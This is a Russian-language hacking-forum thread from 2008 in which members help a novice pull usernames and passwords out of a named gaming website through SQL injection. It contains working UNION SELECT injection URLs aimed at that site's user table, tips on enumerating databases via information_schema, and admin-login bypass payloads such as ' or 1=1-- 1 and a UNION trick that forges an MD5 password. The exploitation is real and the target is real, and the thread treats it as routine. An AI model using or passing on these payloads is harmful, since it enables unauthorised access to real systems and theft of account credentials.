ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

19.11.2008, 23:57
|
|
Новичок
Регистрация: 14.11.2008
Сообщений: 12
Провел на форуме: 42624
Репутация:
10
|
|
Помогите все знаю, но логин и пасс не могу выташить
_http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat_ws(0x3a3a,column_nam e),5,6,7+from+information_schema.columns+where+tab le_name=char(112,111,108,108,95,117,115,101,114)--
_http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,
0x3a,userpass),5,6,7+from+poll_user--
|
|
|

19.11.2008, 23:58
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме: 2337678
Репутация:
354
|
|
_nic
Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно?
Они следят за нами. Всегда! xD
|
|
|

20.11.2008, 02:26
|
|
Постоянный
Регистрация: 05.05.2006
Сообщений: 743
Провел на форуме: 2982851
Репутация:
107
|
|
Сообщение от ThreeD
_nic
Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно?
Они следят за нами. Всегда! xD
Ну а как хоть как то чекнуть днс на эту дырку http://www.securitylab.ru/vulnerability/355730.php ???
|
|
|

20.11.2008, 00:03
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме: 2337678
Репутация:
354
|
|
Sindicat
Я точно не смотрел, но кажется что надо пробить тебе на database(), а потом просто использовать конкатенацию +from+database_name.table_name
И зачем чарить в конце? Захекси =)
Честно-лень смотреть. Мог бы и не писать,скажете вы. Но не писать вообще лень =)
Там же вообще выводится что либо? Принтабельные есть? Т.к. ошибка скачет постоянно...
Без обид, я немного выпил "за сегодняшний удачный день!" =)
|
|
|

20.11.2008, 00:06
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
ThreeD абсолютно прав, мне было не лень )
http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,%200x3a,use rpass),5,6,7+from+d8242sd5804.poll_user--
|
|
|

20.11.2008, 00:24
|
|
Новичок
Регистрация: 14.11.2008
Сообщений: 12
Провел на форуме: 42624
Репутация:
10
|
|
спасибо !!! мне все - ровно не понятно я вывел database() , получил d8242sd15320 - а у тебя получился d8242sd5804 почему так ?
|
|
|

20.11.2008, 00:28
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме: 2337678
Репутация:
354
|
|
Sindicat
Видимо таблица poll_user относится к d8242sd5804 а не к d8242sd15320, иначе бы и конкатенацию использовать не пришлось. Не одна база просто, и ты сидишь не под нужной тебе. А используя d8242sd5804.poll_user, ты получаешь инфу из нужной тебе базы, которой является d8242sd5804, к которой и относится таблица poll_user.
В базе d8242sd15320 таблицы poll_user нет. Юзай concat_ws(0x3A3a,table_schema,table_name)+from+inf ormation_schema.tables , чтобы узнать к какой базе относится нужная тебе таблица.
Последний раз редактировалось ThreeD; 20.11.2008 в 00:31..
|
|
|

20.11.2008, 00:39
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql
но не получается. Как правильно ввести данные?
|
|
|

20.11.2008, 00:47
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Ershik
На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql
но не получается. Как правильно ввести данные?
Access не поддерживает комментарии вот это "--" не катит, прочитай наконец статью
https://forum.antichat.net/threadnav50550-1-10.html
|
|
|

20.11.2008, 00:54
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Сообщение от Ershik
На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql
но не получается. Как правильно ввести данные?
Это так теория, в твоём случае она не применима, но знать будет полезно (для других БД, к примеру мускул).
Это зависит только от запроса, т.е. найти вариант, который прокатывал бы в каждой админке с уязвимой авторизацией не реал.
1. "--" будет служить символом комментария только если после этого чуда идёт пробел, а в админках часто используется обрезание пробельных символов по краям, так что лучше юзать так: "-- 1".
2. Пробывать лучше это:
login' or 1=1-- 1
password' or 1=1-- 1
3. Часто бывает что без извращений с юнионом в админку по скуле в авторизации не попасть, но тут не видя сорца скрипта сделать что либо почти не реал.
Хотя в крации расскажу:
Если авторизации (т.е. проверка правильности введённой инфы) проходит только по результату запроса, то прокатывает посдановка вышеуказанной комбинации.
А бывает, что из запроса (по логину) достается соотвествующий пароль или хеш пароля, а уже затем он сравнивается с введённым тобою, что то вроде этого:
Код:
select password from admin where login = '$login';
В таких случаях нужно через объединение запросов впихивать левые данные:
Код:
логин = 1' and 1=2 union select 'pass'-- 1
И пароль соответственно = pass
Ну или есть хеширование:
Код:
логин = 1' and 1=2 union select md5('pass')-- 1
И пароль соответственно = pass
Но это так теория, на практике это будет геморно осуществить.
4. Ещё как вариант попробовать раскрутить инъекцию как слепую - тоже частенько удаётся сделать.
Последний раз редактировалось Grey; 20.11.2008 в 01:04..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|